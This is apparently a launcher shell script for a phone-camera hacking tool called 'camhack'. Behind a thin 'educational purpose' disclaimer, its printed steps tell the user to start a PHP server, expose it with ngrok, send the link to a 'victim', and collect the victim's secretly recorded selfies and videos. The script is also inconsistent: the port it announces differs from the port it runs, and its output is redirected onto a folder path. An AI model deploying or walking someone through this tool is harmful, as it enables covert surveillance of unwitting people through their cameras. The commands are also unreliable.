printf "\n"
printf "\e[1;92m This tool is only for educational purpose\e[0m\n"
printf "\n"
printf "\e[1;92m Dont't use this tool for illegal activities\e[0m\n"
printf "\n"
cowsay camhack to hack selfie and record video
printf "\n"
printf "\e[1;92m starting php server...\e[0m\n"
printf "\n"
printf "\e[1;92m php server run as localhost at port address 4576\e[0m\n"
printf "\n"
printf "\e[1;92m now port forwarding through ngrok using command ./ngrok http 4576\e[0m\n"
printf "\n"
printf "\e[1;92m send the link to victim that start with https not http\e[0m\n"
printf "\n"
printf "\e[1;92m recorded video are available in /sdcard/camhack/uploads folder\e[0m\n"
printf "\n"
printf "\e[1;92m Don't delete camhack folder in your sdcard\e[0m\n"
printf "\n"
php -S localhost:6060 > /sdcard/camhack
